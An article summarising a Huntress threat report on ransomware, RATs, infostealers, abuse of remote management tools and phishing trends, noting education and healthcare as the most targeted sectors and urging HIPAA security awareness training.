Although ransomware continually presents a threat to enterprises, ransomware just accounts for about 9.5% of threats in general. Other threats include remote access trojans (13%), malware (17%), malicious scripts (22%), and infostealers (24%). RATs are also involved in over 75% of remote access cases. Huntress discovered greater exploitation of remote monitoring and management (RMM) assets like ConnectWise ScreenConnect, LogMeIn, and TeamViewer to acquire access, move laterally, and keep persistence. Phishing has additionally become more advanced and continues to be a favorite method for initial access, supported by malicious structures that require threat actors to perform attacks with little work.
No matter what attack methods are used, the most targeted sector is education. 21% of incidents involve the education sector, followed by healthcare with 17% of incidents. The Huntress researchers mentioned that healthcare is especially at risk of script-based attacks and taking advantage of vulnerabilities in older systems. The majority of the malicious scripts discovered and stopped by Huntress seem associated with info stealers like Gootloader and PowerShell components being misused for confusion and anti-analysis. The scripts frequently asked are for the Windows Registry to collect information for extraction and set up persistence, with the subsequent phase of the attacks usually including installing other malware payloads like RATs.
Huntress mentioned a trend throughout all industries wherein threat actors forego file encryption to pay attention to stealing data and extortion. Ransomware groups that attack healthcare companies likewise have gradually left file encryption since they undertake a speedy, high-volume business structure. The researchers additionally took note of a thinning difference between the complexity of attacks on big companies and attacks on SMEs. The standards of attack techniques on different sizes of businesses have enhanced productivity.
Looking forward, specific trends are increasing: ransomware groups will probably improve their extortion techniques, and others will likely change their extortion techniques to those that prioritize stealing data over file encryption, although exploitation affecting LOLBins, credential stealers, and deploying RATs to preserve control will always be favorite attackers’ weapons. The surge in phishing complexity, such as using QR codes, image-based content, and impersonation of brands, signifies that more caution and HIPAA security awareness training are important.